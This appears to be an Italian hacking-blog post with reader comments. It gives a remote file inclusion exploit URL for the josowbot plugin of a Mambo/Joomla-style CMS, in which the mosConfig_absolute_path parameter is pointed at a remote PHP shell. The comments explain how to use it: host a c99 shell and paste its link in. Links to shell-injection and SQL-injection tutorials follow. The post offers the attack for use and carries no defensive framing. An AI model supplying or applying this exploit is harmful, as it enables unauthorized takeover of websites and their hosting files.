http://{PAGE}/mambots/content/josowbot.content.php?mosConfig_absolute_path={SHELL}
XPL:/mambots/content/josowbot.content.php?mosConfig_absolute_path=

Permette di iniettare una shell in PHP nel sito web dandovi pieno accesso ai file dell'hosting.
Michele
Ti potrebbero interessare anche i seguenti articoli
- Log poisoning e shell injection Video tutorial che illustra come iniettare una shell PHP su un server web avente uno...
- PHP Shell Scanner Sto recuperando tanto materiale interessante nel web per riproporlo di nuovo a voi Clicca qui...
- Fix Nuke Sentinel SQJ Injection ll sentinel non blocca delle sql injection scritte in un certo modo… Per fixarlo: Aprire...
- SQL injection PHP Nuke Tutti ormai conoscono PHP Nuke,il famoso CMS (content manager system ovvero sistema di gestione dei...
- Deluxebb <= 1.1 0day E' una vulnerabilità che affligge le versione di deluxeBB uguali o inferiori alle 1.1 E'...











Ma come funziona? cosa metto nella scritta shell? puoi fare un esempio?
Ciao Marco,
alla scritta Shell devi inserire il link alla Shell (consiglio c99) e poi inviare il link nel tuo browser web.
Spero di esser stato chiaro altrimenti chiedi
frs ho kapito… mi dai il link dello shell?
La devi averla tu sul tuo hosting
e dove la skariko?
Su google ti basta cercare c99.txt e trovi il codice della shell da usare.
ho provato ma dà un errore… tipo You don’t have permission to access /mambots/content/josowbot.content.php on this server.
Vuol dire che è stato eseguito il fix per il bug